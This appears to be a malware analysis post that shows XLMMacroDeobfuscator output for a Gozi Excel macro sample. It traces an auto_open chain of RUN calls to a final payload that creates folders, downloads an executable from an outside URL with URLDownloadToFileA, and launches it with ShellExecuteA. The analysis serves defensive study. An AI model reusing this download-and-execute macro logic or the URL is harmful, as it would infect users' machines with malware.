dissectmalware

GOZI - XLSM macro

May 19th, 2020
https://github.com/DissectMalware/XLMMacroDeobfuscator

[Loading Cells]
auto_open: auto_open->VRGaRHVfOOBnPlxMt!$FE$747
[Starting Deobfuscation]
CELL:FE747 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GC977)
CELL:GC977 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CE608)
CELL:CE608 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HT1777)
CELL:HT1777 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GH1639)
CELL:GH1639 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CT33)
CELL:CT33 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AM806)
CELL:AM806 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BO623)
CELL:BO623 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EF937)
CELL:EF937 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!ER4)
CELL:ER4 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FD1754)
CELL:FD1754 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AB1107)
CELL:AB1107 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FW26)
CELL:FW26 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AQ1559)
CELL:AQ1559 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AU1227)
CELL:AU1227 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!DJ860)
CELL:DJ860 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EV1102)
CELL:EV1102 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BK1730)
CELL:BK1730 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IN1596)
CELL:IN1596 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!W113)
CELL:W113 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CW33)
CELL:CW33 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BV887)
CELL:BV887 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HF85)
CELL:HF85 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FS174)
CELL:FS174 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FK665)
CELL:FK665 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EH437)
CELL:EH437 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BK1)
CELL:BK1 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BO527)
CELL:BO527 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!DQ678)
CELL:DQ678 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HJ904)
CELL:HJ904 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!L685)
CELL:L685 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IG1778)
CELL:IG1778 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!ID1772)
CELL:ID1772 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HU1035)
CELL:HU1035 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!DA758)
CELL:DA758 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GV1657)
CELL:GV1657 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IG527)
CELL:IG527 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FZ1345)
CELL:FZ1345 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!ID662)
CELL:ID662 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HL1309)
CELL:HL1309 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GF1894)
CELL:GF1894 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FO637)
CELL:FO637 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EY645)
CELL:EY645 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EC1430)
CELL:EC1430 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GW1349)
CELL:GW1349 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!B1008)
CELL:B1008 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EG264)
CELL:EG264 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FH921)
CELL:FH921 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EY46)
CELL:EY46 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BP1427)
CELL:BP1427 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BP38)
CELL:BP38 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!N1394)
CELL:N1394 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AF1830)
CELL:AF1830 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!C629)
CELL:C629 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BT1915)
CELL:BT1915 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CT1558)
CELL:CT1558 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IJ79)
CELL:IJ79 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CV56)
CELL:CV56 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EY479)
CELL:EY479 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!IJ1998)
CELL:IJ1998 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FQ13)
CELL:FQ13 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!G17)
CELL:G17 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EL1806)
CELL:EL1806 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EB81)
CELL:EB81 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HR149)
CELL:HR149 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!Y638)
CELL:Y638 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HO1023)
CELL:HO1023 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!HR655)
CELL:HR655 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CU1391)
CELL:CU1391 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AI449)
CELL:AI449 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CM295)
CELL:CM295 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!P231)
CELL:P231 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!I330)
CELL:I330 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!EC1616)
CELL:EC1616 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CX1834)
CELL:CX1834 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FD1365)
CELL:FD1365 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!FG1801)
CELL:FG1801 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!CK1675)
CELL:CK1675 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!GQ683)
CELL:GQ683 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!AJ981)
CELL:AJ981 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!C329)
CELL:C329 , FullEvaluation ,RUN(VRGaRHVfOOBnPlxMt!BD1629)
CELL:BD1630 , FullEvaluation ,CALL("Kernel32","CreateDirectoryA","JCJ","C:\dechTZg",0)
CELL:BD1631 , FullEvaluation ,CALL("Kernel32","CreateDirectoryA","JCJ","C:\dechTZg\xYXndgX",0)
CELL:BD1632 , FullEvaluation ,CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://post.positivefocusskills.com/abonento9.exe","C:\dechTZg\xYXndgX\zfmFNDi.exe",0,0)
CELL:BD1633 , FullEvaluation ,CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\dechTZg\xYXndgX\zfmFNDi.exe",,0,0)
CELL:BD1638 , End ,HALT()
time elapsed: 0.7665233612060547